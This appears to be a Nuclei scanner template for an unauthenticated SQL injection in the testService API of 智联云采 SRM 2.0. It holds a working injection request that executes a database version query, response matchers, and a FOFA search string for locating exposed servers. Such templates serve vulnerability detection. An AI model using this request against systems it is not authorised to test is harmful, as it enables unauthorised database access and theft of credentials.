http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"description":"执行成功！"'
            - '"sqlcode":"0"'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /adpweb/a/ica/api/testService HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
          X-Requested-With: XMLHttpRequest
          Content-Type: application/json

          {
              "dbId": "1001",
              "dbSql": "#set ($lang = $lang) SELECT * FROM v$version",
              "responeTemplate": "{\"std_data\": {\"execution\": {\"sqlcode\": \"$execution.sqlcode\", \"description\": \"$execution.description\"}}}",
              "serviceCode": "q",
              "serviceName": "q",
              "serviceParams": "{\"lang\":\"zh_CN\"}"
          }
id: zhilianyuncai-SRM2-testService-sql
info:
    author: Superhero
    description: |-
        fofa: title=="SRM 2.0"
        智联云采 SRM2.0 testService 接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
    name: 智联云采 SRM2.0 testService SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488824&idx=1&sn=c15c613169e507f1bed038f4a567c5e9&chksm=c267a00bf510291d33c9837f922ff00e376b882d0a27afe92611235be855314b88235415097b&token=1619136955&lang=zh_CN#rd
    severity: high
    tags:
        - 智联云采 SRM2.0
